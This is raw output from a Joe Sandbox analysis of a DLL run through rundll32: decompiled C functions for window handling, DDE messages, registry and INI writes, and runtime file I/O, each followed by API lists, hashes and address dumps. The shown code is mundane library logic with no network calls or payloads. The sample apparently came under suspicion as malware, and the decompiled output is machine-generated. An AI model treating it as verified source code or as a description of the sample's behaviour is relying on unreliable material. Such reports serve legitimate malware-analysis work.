                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886894508-0
                                                                                                            • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                                                            • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v528;
                                                                                                            				void* _v532;
                                                                                                            				char _v536;
                                                                                                            				intOrPtr _t15;
                                                                                                            				long _t22;
                                                                                                            				void* _t25;
                                                                                                            				void* _t29;
                                                                                                            
                                                                                                            				_t15 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t15;
                                                                                                            				_push( &_v532);
                                                                                                            				_push( &_v536);
                                                                                                            				_push(_a8);
                                                                                                            				_push(0x3e8);
                                                                                                            				_t29 = __ecx;
                                                                                                            				L1001CA38();
                                                                                                            				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
                                                                                                            					_t22 = GlobalUnlock(_v532);
                                                                                                            					_push(_v532);
                                                                                                            					_push(0x8000);
                                                                                                            					_push(0x3e4);
                                                                                                            					_push(0x3e8);
                                                                                                            					_push(_a8);
                                                                                                            					L1001CA32();
                                                                                                            					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
                                                                                                            					if(E100203CE(_t29) != 0) {
                                                                                                            						_t25 = E100373B5();
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(0, _v8);
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10031F76
                                                                                                            • GlobalLock.KERNEL32 ref: 10031F81
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                                                            • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                                                            • PostMessageA.USER32 ref: 10031FC4
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 462239228-0
                                                                                                            • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                                                            • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029BA4(struct HWND__* _a4) {
                                                                                                            				struct HWND__* _t3;
                                                                                                            				struct HWND__* _t6;
                                                                                                            				struct HWND__* _t11;
                                                                                                            				struct HWND__* _t14;
                                                                                                            
                                                                                                            				_t3 = GetFocus();
                                                                                                            				_t14 = _t3;
                                                                                                            				if(_t14 != 0) {
                                                                                                            					_t11 = _a4;
                                                                                                            					if(_t14 == _t11) {
                                                                                                            						L10:
                                                                                                            						return _t3;
                                                                                                            					}
                                                                                                            					if(E10029A8E(_t14, 3) != 0) {
                                                                                                            						L5:
                                                                                                            						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                            							L8:
                                                                                                            							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
                                                                                                            							goto L9;
                                                                                                            						} else {
                                                                                                            							_t6 = GetParent(_t11);
                                                                                                            							_t3 = GetDesktopWindow();
                                                                                                            							if(_t6 == _t3) {
                                                                                                            								L9:
                                                                                                            								goto L10;
                                                                                                            							}
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t3 = GetParent(_t14);
                                                                                                            					_t14 = _t3;
                                                                                                            					if(_t14 == _t11) {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					_t3 = E10029A8E(_t14, 2);
                                                                                                            					if(_t3 == 0) {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            				return _t3;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                              • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            • GetWindowLongA.USER32 ref: 10029BE9
                                                                                                            • GetParent.USER32(10032120), ref: 10029BF7
                                                                                                            • GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                            • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 10029C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2818563221-0
                                                                                                            • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                                                            • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10037A96(void* _a4, char* _a8, char* _a12) {
                                                                                                            				void* _t14;
                                                                                                            				long _t18;
                                                                                                            				signed int _t20;
                                                                                                            				long _t25;
                                                                                                            
                                                                                                            				if(_a12 != 0) {
                                                                                                            					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
                                                                                                            						L6:
                                                                                                            						_t14 = 0;
                                                                                                            						L7:
                                                                                                            						return _t14;
                                                                                                            					}
                                                                                                            					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
                                                                                                            					_t18 = RegCloseKey(_a4);
                                                                                                            					if(_t18 != 0 || _t25 != 0) {
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						_t14 = _t18 + 1;
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
                                                                                                            				asm("sbb eax, eax");
                                                                                                            				return  ~_t20 + 1;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                                                            • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                                                            • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuelstrlen$CloseCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 306239685-0
                                                                                                            • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                                                            • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                            				struct tagRECT _v20;
                                                                                                            				struct HWND__* _t12;
                                                                                                            				struct HWND__* _t21;
                                                                                                            
                                                                                                            				ClientToScreen(_a4,  &_a8);
                                                                                                            				_t12 = GetWindow(_a4, 5);
                                                                                                            				while(1) {
                                                                                                            					_t21 = _t12;
                                                                                                            					if(_t21 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                            						GetWindowRect(_t21,  &_v20);
                                                                                                            						_push(_a12);
                                                                                                            						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                            							return _t21;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t12 = GetWindow(_t21, 2);
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1315500227-0
                                                                                                            • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                                                            • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B36C(signed int _a4, signed int _a8, long _a12) {
                                                                                                            				void _v5;
                                                                                                            				signed int _v12;
                                                                                                            				long _v16;
                                                                                                            				signed int _t79;
                                                                                                            				void* _t82;
                                                                                                            				signed int _t86;
                                                                                                            				signed int* _t89;
                                                                                                            				long _t90;
                                                                                                            				void* _t92;
                                                                                                            				intOrPtr _t93;
                                                                                                            				signed int _t97;
                                                                                                            				intOrPtr _t98;
                                                                                                            				char _t100;
                                                                                                            				signed int _t101;
                                                                                                            				long _t103;
                                                                                                            				long _t106;
                                                                                                            				signed int _t107;
                                                                                                            				signed int _t113;
                                                                                                            				signed int _t114;
                                                                                                            				signed char _t117;
                                                                                                            				intOrPtr _t118;
                                                                                                            				long _t120;
                                                                                                            				void* _t124;
                                                                                                            				intOrPtr* _t125;
                                                                                                            				signed int _t127;
                                                                                                            				signed char* _t128;
                                                                                                            				void* _t129;
                                                                                                            				void* _t130;
                                                                                                            
                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                            				_t113 = _a8;
                                                                                                            				_t124 = _t113;
                                                                                                            				if(_a12 == 0) {
                                                                                                            					L42:
                                                                                                            					__eflags = 0;
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t79 = _a4;
                                                                                                            				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
                                                                                                            				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
                                                                                                            				_t82 =  *_t125 + _t127;
                                                                                                            				_t117 =  *((intOrPtr*)(_t82 + 4));
                                                                                                            				if((_t117 & 0x00000002) != 0) {
                                                                                                            					goto L42;
                                                                                                            				}
                                                                                                            				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
                                                                                                            					_a12 = _a12 - 1;
                                                                                                            					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
                                                                                                            					_t124 = _t113 + 1;
                                                                                                            					_v12 = 1;
                                                                                                            					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
                                                                                                            				}
                                                                                                            				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
                                                                                                            					_t86 = _v16;
                                                                                                            					_t118 =  *_t125;
                                                                                                            					_v12 = _v12 + _t86;
                                                                                                            					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
                                                                                                            					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
                                                                                                            						L41:
                                                                                                            						return _v12;
                                                                                                            					}
                                                                                                            					__eflags = _t86;
                                                                                                            					if(_t86 == 0) {
                                                                                                            						L15:
                                                                                                            						_t89 =  *_t125 + _t127 + 4;
                                                                                                            						 *_t89 =  *_t89 & 0x000000fb;
                                                                                                            						__eflags =  *_t89;
                                                                                                            						L16:
                                                                                                            						_t90 = _a8;
                                                                                                            						_t120 = _v12 + _t90;
                                                                                                            						__eflags = _t90 - _t120;
                                                                                                            						_a12 = _t90;
                                                                                                            						_v12 = _t120;
                                                                                                            						if(_t90 >= _t120) {
                                                                                                            							L40:
                                                                                                            							_t114 = _t113 - _a8;
                                                                                                            							__eflags = _t114;
                                                                                                            							_v12 = _t114;
                                                                                                            							goto L41;
                                                                                                            						} else {
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							L17:
                                                                                                            							_t92 =  *_a12;
                                                                                                            							__eflags = _t92 - 0x1a;
                                                                                                            							if(_t92 == 0x1a) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t92 - 0xd;
                                                                                                            							if(_t92 == 0xd) {
                                                                                                            								__eflags = _a12 - _t120 - 1;
                                                                                                            								if(_a12 >= _t120 - 1) {
                                                                                                            									_a12 = _a12 + 1;
                                                                                                            									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
                                                                                                            									__eflags = _t97;
                                                                                                            									if(_t97 != 0) {
                                                                                                            										L26:
                                                                                                            										__eflags = _v16;
                                                                                                            										if(_v16 == 0) {
                                                                                                            											L34:
                                                                                                            											 *_t113 = 0xd;
                                                                                                            											L35:
                                                                                                            											_t113 = _t113 + 1;
                                                                                                            											__eflags = _t113;
                                                                                                            											L36:
                                                                                                            											_t120 = _v12;
                                                                                                            											__eflags = _a12 - _t120;
                                                                                                            											if(_a12 < _t120) {
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L40;
                                                                                                            										}
                                                                                                            										_t98 =  *_t125;
                                                                                                            										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
                                                                                                            										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
                                                                                                            											__eflags = _t113 - _a8;
                                                                                                            											if(__eflags != 0) {
                                                                                                            												L33:
                                                                                                            												E1001968C(__eflags, _a4, 0xffffffff, 1);
                                                                                                            												_t130 = _t130 + 0xc;
                                                                                                            												__eflags = _v5 - 0xa;
                                                                                                            												if(_v5 == 0xa) {
                                                                                                            													goto L36;
                                                                                                            												}
                                                                                                            												goto L34;
                                                                                                            											}
                                                                                                            											__eflags = _v5 - 0xa;
                                                                                                            											if(__eflags != 0) {
                                                                                                            												goto L33;
                                                                                                            											}
                                                                                                            											L32:
                                                                                                            											 *_t113 = 0xa;
                                                                                                            											goto L35;
                                                                                                            										}
                                                                                                            										_t100 = _v5;
                                                                                                            										__eflags = _t100 - 0xa;
                                                                                                            										if(_t100 == 0xa) {
                                                                                                            											goto L32;
                                                                                                            										}
                                                                                                            										 *_t113 = 0xd;
                                                                                                            										 *((char*)( *_t125 + _t127 + 5)) = _t100;
                                                                                                            										goto L35;
                                                                                                            									}
                                                                                                            									_t101 = GetLastError();
                                                                                                            									__eflags = _t101;
                                                                                                            									if(_t101 != 0) {
                                                                                                            										goto L34;
                                                                                                            									}
                                                                                                            									goto L26;
                                                                                                            								}
                                                                                                            								_t103 = _a12 + 1;
                                                                                                            								__eflags =  *_t103 - 0xa;
                                                                                                            								if( *_t103 != 0xa) {
                                                                                                            									_a12 = _t103;
                                                                                                            									goto L34;
                                                                                                            								}
                                                                                                            								_a12 = _a12 + 2;
                                                                                                            								goto L32;
                                                                                                            							}
                                                                                                            							 *_t113 = _t92;
                                                                                                            							_t113 = _t113 + 1;
                                                                                                            							_a12 = _a12 + 1;
                                                                                                            							goto L36;
                                                                                                            						}
                                                                                                            						_t93 =  *_t125;
                                                                                                            						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
                                                                                                            						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
                                                                                                            							_t128 = _t93 + _t127 + 4;
                                                                                                            							 *_t128 =  *_t128 | 0x00000002;
                                                                                                            							__eflags =  *_t128;
                                                                                                            						}
                                                                                                            						goto L40;
                                                                                                            					}
                                                                                                            					__eflags =  *_t113 - 0xa;
                                                                                                            					if( *_t113 != 0xa) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
                                                                                                            					goto L16;
                                                                                                            				} else {
                                                                                                            					_t106 = GetLastError();
                                                                                                            					_t129 = 5;
                                                                                                            					if(_t106 != _t129) {
                                                                                                            						__eflags = _t106 - 0x6d;
                                                                                                            						if(_t106 == 0x6d) {
                                                                                                            							goto L42;
                                                                                                            						}
                                                                                                            						_t107 = E10013707(_t106);
                                                                                                            						L10:
                                                                                                            						return _t107 | 0xffffffff;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(E100136F5())) = 9;
                                                                                                            					_t107 = E100136FE();
                                                                                                            					 *_t107 = _t129;
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            			}































                                                                                                            0x00000000
                                                                                                            0x1001b47c
                                                                                                            0x1001b47e
                                                                                                            0x1001b48c
                                                                                                            0x1001b48f
                                                                                                            0x1001b4a5
                                                                                                            0x1001b4b9
                                                                                                            0x1001b4bf
                                                                                                            0x1001b4c1
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4d1
                                                                                                            0x1001b513
                                                                                                            0x1001b513
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b517
                                                                                                            0x1001b517
                                                                                                            0x1001b51a
                                                                                                            0x1001b51d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b523
                                                                                                            0x1001b4d3
                                                                                                            0x1001b4d5
                                                                                                            0x1001b4da
                                                                                                            0x1001b4ee
                                                                                                            0x1001b4f1
                                                                                                            0x1001b4fe
                                                                                                            0x1001b505
                                                                                                            0x1001b50a
                                                                                                            0x1001b50d
                                                                                                            0x1001b511
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b511
                                                                                                            0x1001b4f3
                                                                                                            0x1001b4f7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4f9
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4dc
                                                                                                            0x1001b4df
                                                                                                            0x1001b4e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4e3
                                                                                                            0x1001b4e8
                                                                                                            0x00000000
                                                                                                            0x1001b4e8
                                                                                                            0x1001b4c3
                                                                                                            0x1001b4c9
                                                                                                            0x1001b4cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4cb
                                                                                                            0x1001b494
                                                                                                            0x1001b495
                                                                                                            0x1001b498
                                                                                                            0x1001b4a0
                                                                                                            0x00000000
                                                                                                            0x1001b4a0
                                                                                                            0x1001b49a
                                                                                                            0x00000000
                                                                                                            0x1001b49a
                                                                                                            0x1001b480
                                                                                                            0x1001b482
                                                                                                            0x1001b483
                                                                                                            0x00000000
                                                                                                            0x1001b483
                                                                                                            0x1001b525
                                                                                                            0x1001b527
                                                                                                            0x1001b52c
                                                                                                            0x1001b52e
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x00000000
                                                                                                            0x1001b52c
                                                                                                            0x1001b440
                                                                                                            0x1001b443
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b44b
                                                                                                            0x00000000
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f8
                                                                                                            0x1001b3fb
                                                                                                            0x1001b411
                                                                                                            0x1001b414
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b41b
                                                                                                            0x1001b421
                                                                                                            0x00000000
                                                                                                            0x1001b421
                                                                                                            0x1001b402
                                                                                                            0x1001b408
                                                                                                            0x1001b40d
                                                                                                            0x00000000
                                                                                                            0x1001b40d

                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                                                            • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t68;
                                                                                                            				void** _t73;
                                                                                                            				signed int _t74;
                                                                                                            				long _t76;
                                                                                                            				intOrPtr _t79;
                                                                                                            				signed int _t81;
                                                                                                            				char* _t86;
                                                                                                            				int _t91;
                                                                                                            				long _t93;
                                                                                                            				intOrPtr* _t100;
                                                                                                            				void* _t102;
                                                                                                            				signed int _t107;
                                                                                                            				char _t110;
                                                                                                            				struct _OVERLAPPED* _t112;
                                                                                                            				long _t115;
                                                                                                            				signed int _t118;
                                                                                                            				struct _OVERLAPPED* _t120;
                                                                                                            				void* _t121;
                                                                                                            				void* _t123;
                                                                                                            
                                                                                                            				_t121 = _t123 - 0x3a0;
                                                                                                            				_t68 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t112 = 0;
                                                                                                            				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
                                                                                                            				 *(_t121 - 0x78) = 0;
                                                                                                            				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
                                                                                                            				if( *(_t121 + 0x3b0) != 0) {
                                                                                                            					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
                                                                                                            					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
                                                                                                            					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
                                                                                                            					}
                                                                                                            					_t73 =  *_t100 + _t118;
                                                                                                            					__eflags = _t73[1] & 0x00000080;
                                                                                                            					if((_t73[1] & 0x00000080) == 0) {
                                                                                                            						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
                                                                                                            						__eflags = _t74;
                                                                                                            						if(_t74 == 0) {
